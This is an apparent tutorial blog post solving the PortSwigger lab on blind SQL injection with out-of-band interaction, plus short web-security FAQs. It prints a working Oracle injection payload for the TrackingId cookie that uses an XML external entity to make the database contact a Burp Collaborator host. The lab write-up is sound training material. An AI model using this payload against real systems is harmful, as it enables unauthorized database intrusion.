Introduction
Hello, friends! How are you all doing? So, this is our 13th article on SQL Injection. In this article, we will cover the PortSwigger Web Security lab on “Blind SQL injection with out-of-band interaction,” providing a step-by-step practical solution.
Lab Description
This lab focuses on a blind SQL Injection vulnerability. The application uses a tracking cookie for analytics, and it performs a SQL query with the submitted cookie value. When we execute the SQL query, it is done asynchronously, and it does not have any immediate effect on the application’s response. However, we can still trigger blind SQL injection by using an external domain for out-of-band interaction.
To solve the lab, we need to use Burp Suite Collaborator for DNS lookup, which will help solve the lab and exploit this vulnerability.
Lab Solution
First, access the lab.
After accessing the lab, open your Burp Suite and enable the proxy. To start, intercept the first page of the application in Burp and send it to the Repeater tab. We will perform further testing on the Repeater tab.
As you can see, we have a cookie named TrackingId, and we need to exploit it.
TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--
We will use this payload to exploit the vulnerability.
Go to Burp Suite and open the Collaborator client. Click on “Copy to clipboard” to copy the payload.
In my case, this is my payload: > owoz4gexpzu1mzmo0e6qeb2ft6zwnl.oastify.com
Now, replace the payload in the code provided above with your Burp Collaborator payload.
Here is the final version of the payload (below):
TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//owoz4gexpzu1mzmo0e6qeb2ft6zwnl.oastify.com/">+%25remote%3b]>'),'/l')+FROM+dual--I have added the Burp Collaborator payload. Now, let’s replace the TrackingId in the request with the one we have in the Repeater tab.
Before forwarding the request, it will look similar to this:
Now, we can forward the request. You can see that in the Burp Collaborator client, we have received DNS values, indicating that the out-of-band blind SQL injection works successfully.
When I refreshed the PortSwigger Web Security lab on “Blind SQL injection with out-of-band interaction,” it was successfully solved.
You can learn everything related to web security on our website. We upload the latest articles on web security topics on a daily basis, so stay with us.
To continue studying check out the next lab i.e. Blind SQL Injection With Out-Of-Band Data Exfiltration, cover the current lab before visiting the next lab. Good Luck!
FAQS
Website security refers to protecting a website or web application from cyberattacks, unauthorized access, or other security threats.
Web application security means protecting a website from cyberattacks. These attacks may include vulnerabilities such as SQL injection, XSS, file inclusion, and others.
It is always a good practice to use an up-to-date browser with timely updates. Keep your browser plugins up-to-date, avoid malicious websites and links, and always enable 2-factor authentication while avoiding clickjacking.
Searching for someone’s social security number or credit card information on the dark web is illegal and unethical. It is important to always avoid such activities and protect yourself and others from cyber threats.
